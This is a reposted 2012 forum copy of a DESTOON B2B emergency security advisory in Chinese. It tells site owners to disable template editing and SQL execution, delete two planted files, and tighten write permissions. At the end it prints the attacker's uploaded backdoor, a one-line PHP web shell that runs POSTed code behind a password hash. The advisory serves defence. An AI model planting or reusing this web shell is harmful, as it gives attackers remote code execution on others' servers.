标题:
DESTOON B2B紧急安全公告20121010
[打印本页]
作者:
andy15703166
时间:
2012-10-11 09:52
标题:
DESTOON B2B紧急安全公告20121010
由于后台模板管理权限过大存在安全隐患,可能导致部分用户遭遇黑客攻击,为了您的网站安全,请看到此公告之后立即做以下处理:
一、修改根目录config.inc.php修改 $CFG['edittpl'] = '
1
'; 为 $CFG['edittpl'] = '
0
'; 禁用在线编辑模板功能,$CFG['executesql'] 也建议设置为
0
禁用后台执行SQL功能。3.0及以下版本用户,请临时删除admin/template.inc.php以免遭遇攻击。
二、检查站点目录是否存在file/swfupload/editor.php和company/link/link.php,如果存在,请立即删除,注意file/swfupload/editor.inc.php为系统正常文件,请不要误删。
设置过伪静态并且站点目录权限设置严格的用户不受此影响,请看到的用户相互转告,尽快处理。
提示:
系统需要设置可写的目录和文件详见:
http://help.destoon.com/install/68.html
,其他文件和目录请不要设置写入权限。
利用Rewrite规则设置网站安全:
http://help.destoon.com/skill/71.html
PS:
黑客上传文件file/swfupload/editor.php 和 link.php文件源码:
<?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>
复制代码
欢迎光临 WDlinux官方论坛 (http://wdlinux.cn/bbs/)
Powered by Discuz! 7.2
